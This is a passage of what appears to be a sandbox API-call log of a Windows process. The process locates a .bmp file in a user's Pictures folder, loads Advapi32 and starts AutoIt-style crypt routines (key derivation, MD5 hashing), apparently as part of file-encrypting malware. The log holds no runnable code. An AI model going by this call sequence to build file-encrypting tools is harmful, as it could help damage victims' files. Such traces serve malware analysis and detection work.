(HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0190.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0190.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0190.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0190.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0190.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0190.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0190.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0190.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0190.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0190.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0190.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0190.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0190.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0190.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0190.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0190.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0190.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0190.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0190.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0190.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0190.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0190.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0190.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0190.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0190.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0190.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0190.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0190.184] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0190.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0190.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0190.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0190.184] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0190.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0190.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0190.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0190.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0190.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0190.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0190.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0190.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0190.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0190.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0190.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0190.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0190.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0190.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0190.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0190.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0190.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0190.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0190.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0190.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0190.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0190.185] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0190.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0190.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0190.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0190.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0190.185] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0190.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0190.185] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0190.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0190.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0190.185] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.bmp", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6d69370, ftCreationTime.dwHighDateTime=0x1d5d92b, ftLastAccessTime.dwLowDateTime=0xa1f44280, ftLastAccessTime.dwHighDateTime=0x1d5e558, ftLastWriteTime.dwLowDateTime=0xa1f44280, ftLastWriteTime.dwHighDateTime=0x1d5e558, nFileSizeHigh=0x0, nFileSizeLow=0x4969, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="uPfzg.bmp", cAlternateFileName="")) returned 0x90af58 [0190.187] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0190.187] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0190.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0190.187] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0190.187] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0190.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0190.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0190.187] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.187] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0190.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0190.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0190.187] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0190.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0190.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0190.188] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0190.188] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0190.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0190.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0190.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0190.188] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0190.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0190.188] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0190.188] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0190.188] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.188] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0190.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0190.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0190.189] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0190.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0190.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0190.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0190.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0190.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0190.189] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.189] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0190.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0190.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0190.189] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0190.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0190.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0190.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0190.189] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0190.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0190.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0190.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0190.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0190.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0190.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0190.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0190.190] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0190.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0190.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0190.191] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0190.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0190.191] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0190.191] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0190.191] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.191] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.191] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.191] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0190.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0190.191] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0190.191] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0190.191] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.191] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0190.191] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0190.191] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0190.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0190.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0190.191] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0190.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0190.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0190.192] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0190.192] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0190.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0190.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0190.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0190.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0190.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0190.192] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0190.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0190.192] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0190.192] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0190.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0190.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0190.192] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.192] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0190.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0190.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0190.192] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.192] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0190.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0190.192] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0190.192] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0190.192] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.193] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0190.193] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0190.193] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0190.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0190.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0190.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0190.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0190.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0190.193] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.193] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0190.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0190.193] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0190.193] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0190.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0190.193] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0190.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0190.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0190.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0190.193] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0190.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0190.193] 